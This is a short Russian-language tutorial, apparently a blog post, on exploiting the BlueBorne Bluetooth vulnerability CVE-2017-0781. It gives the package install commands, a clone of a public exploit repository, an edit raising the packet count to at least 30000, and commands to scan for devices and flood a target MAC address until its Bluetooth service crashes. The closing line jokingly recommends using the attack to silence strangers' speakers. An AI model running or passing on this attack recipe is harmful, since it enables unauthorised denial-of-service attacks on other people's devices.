Blueborne

Blueborne - это общее название восьми уязвимостей службы Bluetooth, которые могут привести к утечке данных, RCE и т.д. Переполнение буфера также относится к этому списку, и оно, в свою очередь, приводит к отказу Bluetooth на целевом устройстве.

Код данной уязвимости в базе CVE - CVE-2017-0781. Автоматизированный скрипт для её эксплуатации есть на Github, воспользуемся им для проведения тестовой атаки.

Установка и настройка:

apt-get update

apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential

pip install --upgrade pip

pip install --upgrade pwntools

apt-get install bluetooth libbluetooth-dev

pip install pybluez

git clone https://github.com/ojasookert/CVE-2017-0781

В скачанном python файле нужно подкорректировать количество пакетов, изменив переменную count до 30000 минимум.

Использование:

hcitool scan

python CVE-2017-0781.py TARGET=<MAC адрес>

Как итог на атакуемое устройство начнут посылаться запросы, тем самым переполняя буфер, что приведет к ошибкам и отключению службы. Крайне "удобный" способ заглушить колону местной шпане

Да, есть и его альтернатива в виде "nRF-Connect", но тот уже тянет на отдельную статью)))